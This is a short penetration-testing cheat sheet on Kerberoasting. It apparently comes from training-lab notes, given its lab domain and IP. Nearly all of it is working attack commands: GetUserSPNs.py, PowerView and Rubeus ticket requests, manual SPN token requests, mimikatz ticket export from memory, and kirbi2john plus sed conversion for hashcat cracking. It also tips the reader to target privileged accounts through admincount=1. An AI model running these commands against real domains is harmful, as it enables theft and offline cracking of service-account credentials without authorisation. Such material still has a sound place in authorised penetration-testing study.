🔥Kerberoasting

Linux

Kerberoasting with GetUserSPNs.py

• Listing SPN accounts:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

• To get TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Or just request works too.

Windows

Automated

Powerview

• To import and view all users

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

• Exporting all tickets to a CSV file

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

• Viewing it

cat .\ilfreight_tgs.csv

Rubeus

• Check options

.\Rubeus.exe

• To check stats:

.\Rubeus.exe kerberoast /stats

.\Rubeus.exe kerberoast /nowrap /tgtdeleg

• To get hash

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap    #admincount gives high-value targets

To get RC4 encrypted (etype 23) use /tgtdeleg

Manual

• Enumerating SPNs setspn.exe -Q */*

• Targeting single user:

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

• Retrieving all tickets `

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

• Extracting tickets from memory using mimikatz:

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export  

• Now to crack:

echo "<base64 blob>" |  tr -d \\n 

cat encoded_file | base64 -d > sqldev.kirbi

Use Kirbi2john Then modify crack_file from using kirbi2john:

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Now run the output through hashcat